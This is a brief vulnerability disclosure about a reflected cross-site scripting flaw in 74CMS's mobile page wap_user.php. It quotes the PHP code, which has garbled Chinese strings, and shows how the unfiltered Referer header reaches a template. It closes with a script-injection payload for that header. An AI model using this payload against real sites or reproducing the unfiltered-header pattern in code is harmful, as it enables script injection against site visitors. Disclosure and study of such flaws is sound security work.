74CMS wap_user.php XSS vulnerability

File /74cms/wap/wap_user.php:

45 elseif ($act == 'add_favorites')
46 {
47     require_once(QISHI_ROOT_PATH.'include/fun_personal.php');
48     $id=isset($_GET['id'])?trim($_GET['id']):exit("³ö´íÁË");
49     $link[0]['text'] = "[·µ»ØÉÏÒ»Ò³]";
50     $link[0]['href'] = $_SERVER["HTTP_REFERER"];
51     $link[1]['text'] = "[²é¿´ÊղؼÐ]";
52     $link[1]['href'] = 'wap_user.php?act=favorites';
53     if(add_favorites($id,$_SESSION['uid'])==0)
54     {
55         WapShowMsg("Ìí¼Óʧ°Ü£¬ÊղؼÐÖÐÒѾ­´æÔÚ´Ëְλ",0,$link);
56     }
57     else
58     {
59         WapShowMsg("Ìí¼Ó³É¹¦",2,$link);
60     }
61 }

I won't explain the mojibake. Line 50 takes the Referer header without any filtering, and line 55 passes it to WapShowMsg. The implementation of WapShowMsg:

function WapShowMsg($msg_detail, $msg_type = 0, $links = array())
{
    global $smarty;
    if (count($links) == 0)
    {
        $links[0]['text'] = '·µ»ØÉÏÒ»Ò³';
        $links[0]['href'] = 'javascript:history.go(-1)';
    }
    $smarty->assign('ur_here',     'ϵͳÌáʾ');
    $smarty->assign('msg_type',    $msg_type);
    $smarty->assign('msg_detail',  $msg_detail);
    $smarty->assign('links',       $links);
    $smarty->assign('default_url', $links[0]['href']);
    $smarty->display('wap/wap-showmsg.htm');
    exit();
}

The value is handed to the template without filtering, so JS can be injected directly through the Referer header to trigger the vulnerability:

"><script>alert(1)</script>